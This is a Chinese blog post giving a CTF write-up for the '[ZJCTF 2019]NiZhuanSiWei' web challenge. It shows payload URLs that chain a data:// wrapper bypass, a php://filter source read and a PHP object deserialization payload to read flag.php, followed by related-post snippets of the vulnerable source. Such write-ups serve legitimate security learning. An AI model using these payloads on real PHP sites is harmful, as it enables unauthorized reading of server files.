[ZJCTF 2019]NiZhuanSiWei

于 2021-06-04 08:47:27 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/borrrrring/article/details/117546772
版权

考察内容:
1.data协议绕过
2.filter文件读取
3.反序列化绕过

看到这个题目我一开始还拼了半天,据我的猜测来看应该是 逆转思维???
在这里插入图片描述
一打开靶机 我们可以看到一段代码
看到代码中有useless.php,我们打开看一下 emmm 但是什么都没有真的就是useless
欲尝试 利用filter来进行文件读取 但是依旧也没有回显出来什么
参考了别人的wp 是要先利用data协议绕过 将welcome to the zjctf写入
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= (d2VsY29tZSB0byB0aGUgempjdGY=是welcome to the zjctf的base64编码形式)
在这里插入图片描述
代码中有正则匹配,我们需要绕过~~
此时我们可以先利用filter进行文件读取text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
在这里插入图片描述

出现了base64,我们将其进行解码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

阿这,这个题还没结束,解出来了新的代码。。。阿,对哦,还有一个参数这怎么能算完呢。
我们可以看到这里将password的值反序列化了
在这里插入图片描述
那么我们就将file=flag.php进行序列化作为password的参数应该就可以获得flag了

<?php
class Flag{
	public $file="flag.php";
}
$a = new Flag();
echo serialize($a);
?>

得到:O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
构造payload:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
在这里插入图片描述
查看源码 获得flag
在这里插入图片描述

borrrrring
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf——[ZJCTF 2019]NiZhuanSiWei
最新发布
m_de_g的博客
04-16 433
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。把整个文件读入一个字符串中。进行抓包传输,开始还一直以为是。方法二需要注意的是,需要使用。的问题,踩了一堆的坑。
魔术方法总结
梦里不知身是客
12-26 9838
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1190
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1399
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1315
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3888
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值